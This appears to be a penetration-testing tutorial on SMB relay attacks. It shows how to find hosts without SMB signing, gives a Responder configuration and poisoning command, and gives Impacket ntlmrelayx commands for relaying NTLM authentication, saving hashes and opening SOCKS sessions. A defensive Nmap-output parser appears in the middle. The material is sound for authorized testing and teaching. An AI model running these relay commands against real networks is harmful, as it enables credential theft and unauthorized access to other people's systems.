SMB Relaying
After observing LLMNR and/or NBT-NS traffic with Responder and forcing the client to authenticate to your machine, the attacker can relay the captured Net-NTLMv2 authentication to every in-scope system that has SMB Signing Disabled.
Identifying Systems with SMB Signing Disabled
RunFinger.py
RunFinger.py is included with Responder in its tools/ directory. Run it against either a subnet or a file of hosts and parse the results with cut:
python3 RunFinger.py -i $subnet
CrackMapExec
A list can also easily be created with CrackMapExec:
crackmapexec smb $subnet --gen-relay-list
Nmap
Nmap can also create a list of hosts that have SMB Signing Disabled:
nmap --script=smb-security-mode -p445 $ip
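As an added example (not code from Responder, Impacket or the author of this page), the following Python parses the normal output of the Nmap command above and lists the hosts whose message_signing is anything other than required, which is the set an audit should flag for signing enforcement; the sample Nmap output is constructed and trimmed to the lines the parser needs.

```python
import re

# Constructed sample of `nmap --script=smb-security-mode -p445` normal output,
# trimmed to the relevant lines; covers the three signing states the script reports.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for dc01.corp.example (10.0.0.10)
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Nmap scan report for 10.0.0.12
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
"""

# Matches "Nmap scan report for 10.0.0.5" and "Nmap scan report for host (10.0.0.5)".
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")
SIGNING_RE = re.compile(r"^\|_?\s+message_signing:\s*(\w+)")

def parse_signing(nmap_output):
    """Map each scanned host to its message_signing value: disabled, supported or required."""
    results, host = {}, None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = SIGNING_RE.match(line)
        if m and host:
            results[host] = m.group(1)
    return results

def signing_not_required(nmap_output):
    """Hosts that do not enforce signing; these should be fixed, since they accept relayed auth."""
    hosts = [h for h, s in parse_signing(nmap_output).items() if s != "required"]
    return sorted(hosts, key=lambda h: tuple(int(o) for o in h.split(".")))

if __name__ == "__main__":
    for host in signing_not_required(SAMPLE_NMAP_OUTPUT):
        print(host)
```

Point it at a saved `-oN` scan of your own subnet to get the list of hosts where SMB signing still needs to be enforced.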
SMB Relaying 101
After confirming LLMNR/NBT-NS traffic and identifying systems with SMB Signing Disabled, we are ready to perform the attack. First, we need to modify the Responder.conf file and turn off both the SMB and HTTP servers, so that Responder poisons the name lookups but leaves those connections for ntlmrelayx to handle:
# responder.conf
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
We can then run Responder:
responder -I eth0 -dwP
Next, run ntlmrelayx.py from Impacket, supplying the file of hosts previously identified as having SMB Signing Disabled:
# Example generic relaying
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support
# Save hashes from relaying locally (-of takes a base output filename)
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support -of relayed_hashes
Relaying with SOCKS
We can also enable SOCKS support while relaying for interactive sessions. Using this flag will also provide you with a session on the host if the user is not a local administrator:
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support --socks